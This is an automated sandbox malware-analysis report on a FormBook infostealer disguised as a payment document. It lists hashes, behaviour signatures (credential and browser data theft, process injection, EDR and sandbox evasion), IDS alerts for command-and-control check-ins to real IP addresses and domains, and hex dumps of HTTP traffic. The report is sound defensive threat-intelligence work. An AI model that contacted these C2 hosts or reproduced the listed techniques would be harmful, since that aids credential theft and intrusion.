Windows Analysis Report
Payment&WarantyBonds.exe

Overview

General Information

Sample name: Payment&WarantyBonds.exe
(renamed file extension from bat to exe)
Original sample name: Payment&WarantyBonds.bat
Analysis ID: 1545186
MD5: a9da1b42f6ad80ee6085f69e6c25f49b
SHA1: e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256: 4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Payment&WarantyBonds.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
    • Payment&WarantyBonds.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
      • oDnyHukDVUZk.exe (PID: 6100 cmdline: "C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systeminfo.exe (PID: 1236 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
          • oDnyHukDVUZk.exe (PID: 3804 cmdline: "C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5856 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.Payment&WarantyBonds.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: Payment&WarantyBonds.exeReversingLabs: Detection: 23%
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Payment&WarantyBonds.exeJoe Sandbox ML: detected
                Source: Payment&WarantyBonds.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDnyHukDVUZk.exe, 00000006.00000002.4147995475.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4147962601.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0056C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0056C500
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then xor eax, eax7_2_00559E20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then mov ebx, 00000004h7_2_046504DE

                Networking

                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49794 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49826 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49840 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49840 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49890 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49876 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49918 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49918 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49954 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49985 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49904 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50000 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50000 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 144.76.190.39:80
                Source: DNS query: www.030002059.xyz
                Source: DNS query: www.xipowerplay.xyz
                Source: DNS query: www.091210.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 20.2.249.7 20.2.249.7
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: systeminfo.exe, 00000007.00000002.4149067807.00000000060F8000.00000004.10000000.00040000.00000000.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4148454215.00000000039D8000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="S equals www.facebook.com (Facebook)
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:57 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 
29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:00 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 